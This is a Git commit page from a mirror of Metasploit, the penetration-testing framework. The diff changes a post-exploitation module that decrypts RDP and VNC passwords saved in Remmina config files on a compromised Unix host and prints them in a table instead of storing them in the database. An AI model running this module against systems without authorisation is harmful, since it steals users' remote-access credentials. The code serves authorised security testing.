infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Rip out create_credential* stuff. Use what works

bug/bundler_fix
Jon Hart 2014-10-30 16:11:13 -07:00
parent e5bb13a609
commit 6e1cdfde36
1 changed files with 35 additions and 43 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

78
modules/post/multi/gather/remmina_creds.rb
View File

@ -11,28 +11,40 @@ class Metasploit3 < Msf::Post
include Msf::Post::Unix
def initialize(info = {})
super(update_info(info,
'Name' => 'UNIX Gather Remmina Credentials',
'Description' => %q(
Post module to obtain credentials saved for RDP and VNC
from Remmina's configuration files. These are
encrypted with 3DES using a 256-bit key generated by
Remmina which is (by design) stored in (relatively)
plain text in a file that must be properly protected.
),
'License' => MSF_LICENSE,
'Author' => ['Jon Hart <jon_hart[at]rapid7.com>'],
'Platform' => %w(bsd linux osx unix),
'SessionTypes' => %w(shell meterpreter)
))
super(update_info(
info,
'Name' => 'UNIX Gather Remmina Credentials',
'Description' =>
"Post module to obtain credentials saved for RDP and VNC
from Remmina's configuration files. These are
encrypted with 3DES using a 256-bit key generated by
Remmina which is (by design) stored in (relatively)
plain text in a file that must be properly protected.",
'License' => MSF_LICENSE,
'Author' => ['Jon Hart <jon_hart[at]rapid7.com>'],
'Platform' => %w(bsd linux osx unix),
'SessionTypes' => %w(shell meterpreter)
))
end
def run
creds_count = extract_all_creds
if creds_count == 0
creds = extract_all_creds
creds.uniq!
if creds.empty? == 0
print_status('No Reminna credentials collected')
else
print_good("Collected #{creds_count} sets of Remmina credentials")
vprint_good("Collected #{creds.size} sets of Remmina credentials")
cred_table = Rex::Ui::Text::Table.new(
'Header' => 'Remmina Credentials',
'Indent' => 1,
'Columns' => %w(Host Port Service User Password)
)
creds.each do |cred|
cred_table << cred
end
print_line(cred_table.to_s)
end
end
@ -54,7 +66,7 @@ class Metasploit3 < Msf::Post
# Extracts all remmina creds found anywhere on the target
def extract_all_creds
creds_count = 0
creds = []
user_dirs = enum_user_directories
if user_dirs.empty?
print_error('No user directories found')
@ -91,15 +103,15 @@ class Metasploit3 < Msf::Post
if cred_files.empty?
vprint_status("No Remmina credential files in #{remmina_dir}")
else
creds_count += extract_creds(secret, cred_files)
creds |= extract_creds(secret, cred_files)
end
end
end
creds_count
creds
end
def extract_creds(secret, files)
creds_count = 0
creds = []
files.each do |file|
settings = get_settings(file)
if settings.empty?
@ -140,27 +152,7 @@ class Metasploit3 < Msf::Post
end
if host && user && password
credential_core = create_credential(
origin_type: :session,
post_reference_name: self.refname,
private_type: :password,
private_data: password,
session_id: session_db_id,
username: user,
workspace_id: myworkspace_id
)
login_data = {
address: host,
port: port,
protocol: 'tcp',
service_name: proto.downcase,
core: credential_core,
access_level: 'User',
status: Metasploit::Model::Login::Status::UNTRIED,
workspace_id: myworkspace_id
}
create_credential_login(login_data)
creds_count += 1
creds << [ host, port, proto.downcase, user, password ]
else
missing = []
missing << 'host' unless host
@ -169,7 +161,7 @@ class Metasploit3 < Msf::Post
vprint_error("No #{missing.join(',')} in #{file}")
end
end
creds_count
creds
end
def get_settings(file)